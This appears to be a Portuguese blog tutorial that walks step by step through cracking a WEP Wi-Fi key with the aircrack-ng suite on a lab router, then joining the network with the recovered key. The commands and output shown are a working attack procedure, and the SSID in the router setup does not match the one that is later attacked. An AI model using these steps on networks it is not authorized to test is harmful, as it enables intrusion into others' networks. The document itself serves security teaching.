URL:

Opção :




REVELANDO CHAVES WEP

01 Passo

Configurando o roteador wireless

Como este ataque foi realizado em um ambiente controlado realizei as seguintes configurações no Roteador:

Name (SSID): SECURITY TESTE
Channel: 6
Security: WEP (Wired Equivalent Privacy)
Passphrase: 123456
Key 1: AA8465E6A4

wep00

02 Passo
Verificação da Interface wlan1

root@bt:/# ifconfig wlan1

wep01

03 Passo
Listando todas as redes disponíveis

root@bt:/# iwlist scan

wep02

04 Passo
Resultado do Scan

MAC Address: 00:1F:33:22:5B:50
Channel: 6
ESSID:“100SECURITY”

wep03

05 Passo
Iniciando o Modo Monitor do airmon-ng sobre a Interface wlan1

root@bt:/# airmon-ng start wlan1

wep04

06 Passo
Modo Monitor iniciado

Observe que Modo Monitor da interface wlan1 foi habilitado para a interface mon0

mon0 – Interface de rede que funciona de modo promíscuo

wep05

07 Passo
Utilizando o airodump-ng para capturar os dados

root@bt:/# airodump-ng –ivs -w senha -c 6 mon0

airodump-ng: Programa utilizado para fazer o Dump dos pacotes
–ivs : Vetor de Inicialização
-w : Define o prefixo do arquivo .ivs que será gerado ex.: ( senha-01.ivs )
-c : Canal da Rede ex.: ( 6 )
mon0 : Interface de rede que funciona de modo promíscuo

wep06

08 Passo
Acompanhando a captura de dados

Quando a coluna #Data ultrapassar 20.000 já se considera possível a quebra completa da chave, a casos que podem exibir uma captura maior.

No ex.: (21058) IVs foram capturados

wep07

09 Passo
Revelando a chave

root@bt:/# aircrack-ng -a 1 senha-01.ivs

aircrack-ng : Programa utilizado para quebra a senha dos IVs capturados
-a : Define o modo de ataque
1 : Modo de ataque WEP
senha-01.ivs : Arquivo gerado dos IVs capturados

wep08

10 Passo
Chave Encontrada

KEY FOUND! [ AA:84:65:E6:A4 ] Chave: AA8465E6A4

wep09

11 Passo
Editando o arquivo interfaces

root@bt:/# vim /etc/network/interfaces

wep10

12 Passo
Definindo as configurações

auto wlan1
iface wlan1 inet dhcp
wireless-essid 100SECURITY
wireless-key AA8465E6A4

wep11

13 Passo
Reiniciando as interfaces

root@bt:/# ./etc/init.d/networking restart

wep12

14 Passo
Atribuição de IP via DHCP

O IP 10.0.0.10 foi atribuído para a interface wlan1 através do roteador 10.0.0.1

wep13

15 Passo
Exibindo as definições da interface wlan1

root@bt:/# iwconfig wlan1

ESSID: “100SECURITY”
Encryption key: AA84-65E6-A4

wep14

16 Passo
Exibindo as configurações de rede da Interface wlan1

root@bt:/# ifconfig wlan1

IP Address : 10.0.0.10
Broadcast : 10.0.0.255
Netmask : 255.255.255.0

wep15

17 Passo
Realizando um teste de ping para o roteador

root@bt:/# ping 10.0.0.1

wep16

Compartilhar usando :

DEIXE SEU COMENTARIO :

Comentarios - Mundo Hacker | Facebook-copyright(™ © ®)